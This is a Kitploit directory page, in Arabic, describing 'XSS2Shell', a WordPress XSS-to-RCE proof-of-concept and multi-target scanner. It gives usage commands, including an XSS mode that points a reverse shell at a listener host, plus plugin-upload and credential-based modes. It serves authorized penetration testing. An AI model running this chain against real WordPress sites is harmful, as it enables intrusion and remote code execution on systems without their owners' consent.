Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
XSS2Shell-CVE-2026-64638 — ماسح أمني لـ WordPress يحدد بصمات الإصدارات، ويكتشف ثغرات XSS المنعكسة عبر أهداف متعددة بشكل متزامن، ويدعم سير عمل استغلال مُصادَق من XSS إلى RCE للاختبار المُصرَّح به. | Kitploit
أدوات/GitHubGitHub/mr-leonardogomes/xss2shell-cve-2026-64638
الاستطلاعماسحات الثغرات الأمنية للويبالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmr-leonardogomes/xss2shell-cve-2026-64638

XSS2Shell-CVE-2026-64638

ماسح أمني لـ WordPress يحدد بصمات الإصدارات، ويكتشف ثغرات XSS المنعكسة عبر أهداف متعددة بشكل متزامن، ويدعم سير عمل استغلال مُصادَق من XSS إلى RCE للاختبار المُصرَّح به.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
16منذ شهر واحدلم تتم المراجعة بعد

🔍 @Mr-LeonardoGomes

💀 XSS2Shell-CVE-2026-64638

Versão 2026 Status Ativo PRs Bem-vindos Licença MIT
Feito com amor Bug Bounty 2026 Pentest Metodologia

Metodologia de Caça a Bugs 2026

XSS2Shell الماسح متعدد الأهداف

المطوّر: الفضل: YogaGymn

أداة PoC/فحص لاختبارات الأمان المصرّح بها على WordPress. يحتوي المشروع على مسار استغلال لهدف واحد ووضع فحص فقط متعدد الأهداف متزامن.

مهم: استخدم هذا المشروع فقط على تثبيتات WordPress التي تملكها أو التي لديك إذن صريح لاختبارها. الماسح متعدد الأهداف محدود عمدًا بتحديد الإصدار وكشف انعكاس XSS؛ فهو لا ينفّذ التقاط بيانات الاعتماد أو رفع إضافة أو RCE ضد قائمة أهداف.

الميزات

وضع الهدف الواحد

يدعم السكربت الأصلي:

  • تحديد إصدار WordPress.
  • كشف انعكاس XSS.
  • أوضاع auto وxss وdirect.
  • تدفق المصادقة المباشرة في WordPress ورفع إضافة (plugin).
  • وظيفة سلسلة XSS الموجودة في PoC الأصلي.
  • وظيفة الاستدعاء/القشرة العكسية الاختيارية الموجودة في PoC الأصلي.

الوضع متعدد الأهداف

يدعم الماسح المضاف:

  • قراءة الأهداف من ملف نصي.
  • إزالة الأهداف المكررة.
  • فحص متزامن باستخدام ThreadPoolExecutor.
  • عدد قابل للتهيئة من العمال (workers).
  • كشف إصدار WordPress.
  • كشف انعكاس XSS.
  • تقرير تقدّم.
  • النتائج محفوظة بنفس ترتيب ملف الإدخال.
  • إحصاءات موجزة.

الوضع متعدد الأهداف لا يستدعي دوال RCE الأصلية.

المتطلبات

  • Python 3.9+
  • requests

ثبّت التبعية:

root@kitploit:~
python3 -m pip install requests

إذا كان توزيع Linux لديك يستخدم بيئة Python مُدارة خارجيًا، فاستخدم بيئة افتراضية:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install requests

التثبيت

استنسخ المشروع أو انسخه: الأصل من إكسبلويت yogaGymn

root@kitploit:~
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638

أو ببساطة ضع:

root@kitploit:~
xss2shell.py

في دليل العمل الخاص بك.

الماسح متعدد الأهداف

أنشئ ملفًا باسم targets.txt أو alvos.txt:

root@kitploit:~
https://example1.test
https://example2.test
https://example3.test

يتم تجاهل التعليقات والأسطر الفارغة:

root@kitploit:~
# أهداف مختبر مصرّح به
https://example1.test

https://example2.test

شغّل الماسح:

root@kitploit:~
python3 xss2shell.py -i targets.txt

التزامن الافتراضي هو 10 عمال (workers).

تغيير التزامن

على سبيل المثال، استخدم 20 عاملًا:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 20

لمختبر صغير:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 5

لا تختر عددًا مرتفعًا دون داعٍ من workers، فقد يزيد ذلك من حمل الاتصالات ويؤدي إلى تفعيل حدود المعدل أو الضوابط الدفاعية.

تغيير ملف الإخراج

root@kitploit:~
python3 xss2shell.py \
  -i targets.txt \
  --workers 10 \
  --output results.txt

مثال على الإخراج

root@kitploit:~
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE

[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)

=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected  : 1
Not detected  : 2
Errors        : 0
Results saved : scan_results.txt

شكل النتيجة

يستخدم scan_results.txt الافتراضي حقولًا مفصولة بعلامات تبويب:

root@kitploit:~
TARGET  WORDPRESS_VERSION  XSS_STATUS  XSS_DETAIL

مثال:

root@kitploit:~
https://example1.test    6.8.2    XSS_NOT_DETECTED          ESCAPED
https://example2.test    6.7.1    XSS_REFLECTION_DETECTED   AREA_BYPASS

قيم حالة XSS


الحالة المعنى


XSS_REFLECTION_DETECTED رصد الماسح سلوك انعكاس HTML المختبر. هذا ليس بحد ذاته دليلًا على RCE.

XSS_NOT_DETECTED لم يتم رصد الانعكاس المختبر.

ERROR واجه الفحص استثناءً.

قيم تفاصيل XSS

يمكن للماسح الإبلاغ عن تفاصيل مثل:

  • RAW_HTML
  • AREA_BYPASS
  • ESCAPED
  • STRIPPED
  • NOT_REFLECTED

تصف هذه القيم الاستجابة التي لاحظتها روتين الكشف؛ ويجب التحقق منها يدويًا قبل اعتبار النتيجة ثغرة مؤكدة.

الاستخدام مع هدف واحد

يدعم السكربت الأصلي أيضًا وسيطات هدف واحد.

الوضع التلقائي

root@kitploit:~
python3 xss2shell.py \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

الوضع المباشر

root@kitploit:~
python3 xss2shell.py \
  --mode direct \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

وضع XSS

root@kitploit:~
python3 xss2shell.py \
  --mode xss \
  --lhost 192.0.2.10 \
  http://authorized-lab.test

يمكن لسير عمل XSS/المباشر إنشاء أو تفعيل إضافة تحتوي على وظيفة تنفيذ أوامر. استخدمها فقط في بيئة اختبار مصرّح بها.

مرجع واجهة سطر الأوامر (CLI)

root@kitploit:~
usage: xss2shell.py [-h]
       [-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
       [--mode {auto,xss,direct}]
       [-u USERNAME] [-p PASSWORD]
       [--lhost LHOST] [--lport LPORT]
       [--slug SLUG] [--callback-port CALLBACK_PORT]
       [--no-rev]
       [target]

الوسائط


الوسيط الوصف


target عنوان URL لهدف واحد.

-i, --input ملف يحتوي على أهداف متعددة.

--output ملف الإخراج لنتائج الأهداف المتعددة. الافتراضي: scan_results.txt.

--workers عدد العمال المتزامنين. الافتراضي: 10.

--mode وضع الهدف الواحد الأصلي: auto أو xss أو direct.

-u, --username اسم مستخدم WordPress لسير العمل المباشر/الاحتياطي الأصلي.

-p, --password كلمة مرور WordPress لسير العمل المباشر/الاحتياطي الأصلي.

--lhost مضيف الاستدعاء/القشرة العكسية لـ PoC الأصلي.

--lport منفذ القشرة العكسية. الافتراضي: 4444.

--slug معرّف الإضافة (slug). الافتراضي: xss2shell.

--callback-port منفذ خادم الاستدعاء. الافتراضي: 9090.

--no-rev تخطّي تشغيل القشرة العكسية في سير العمل الأصلي.

كيف يعمل الفحص المتزامن

يستخدم الوضع متعدد الأهداف الميزة التالية من Python:

root@kitploit:~
ThreadPoolExecutor

يتم إرسال كل هدف كمهمة فحص مستقلة:

root@kitploit:~
targets.txt
     |
     v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ... 
+----+----+----+----+
  |    |    |    |
  v    v    v    v
 WP   WP   WP   WP
 XSS  XSS  XSS  XSS
  |    |    |    |
  +----+----+----+
        |
        v
   scan_results.txt

يتم جمع النتائج عند اكتمال المهام، بينما يتم إنشاء الإخراج النهائي وفقًا للترتيب الأصلي للأهداف.

النطاق والأمان

تم تصميم الوضع متعدد الأهداف لتقييمات الأمان المصرّح بها وبيئات المختبر.

سير العمل الموصى به:

  1. احصل على إذن كتابي.
  2. قم بتضمين النطاقات/عناوين IP المصرّح بها فقط في ملف targets.txt.
  3. ابدأ بعدد مخفّض من workers (عمليات التنفيذ).
  4. حلّل مخرجات الماسح.
  5. تحقق يدويًا من النتائج ذات الصلة.
  6. وثّق الأدلة والإصلاحات.

لا تستخدم الماسح ضد أنظمة أطراف ثالثة دون إذن.

القيود

الماسح ليس أداة كاملة لتقييم الثغرات.

على وجه الخصوص:

  • لا يثبت انعكاس HTML المكتشف تلقائيًا وجود ثغرة XSS قابلة للاستغلال.
  • قد يكون إصدار WordPress الذي تم الحصول عليه من endpoints عامة مفقودًا أو غير صحيح.
  • حالة unknown (غير معروف) لا تعني أن الهدف قابل للاختراق.
  • قد تؤدي أخطاء الشبكة إلى نتائج غير مكتملة.
  • قد يؤثر سلوك WAF/CDN على الكشف.
  • لا يحدد الماسح قابلية الاستغلال أو إمكانية RCE في الوضع متعدد الأهداف.
  • يجب التحقق من النتائج يدويًا قبل الإبلاغ عن ثغرة.

هيكل المشروع

root@kitploit:~
.
├── xss2shell.py
├── targets.txt
└── scan_results.txt

الترخيص

لا توجد معلومات حول الترخيص في الكود المصدري المقدم.

إذا تم نشر هذا المشروع علنًا، أضف ملف ترخيص صريحًا مثل LICENSE. هذا الكود هو تطوير لاحق للكود الأصلي من ZSecurity.

تنزيل الأداة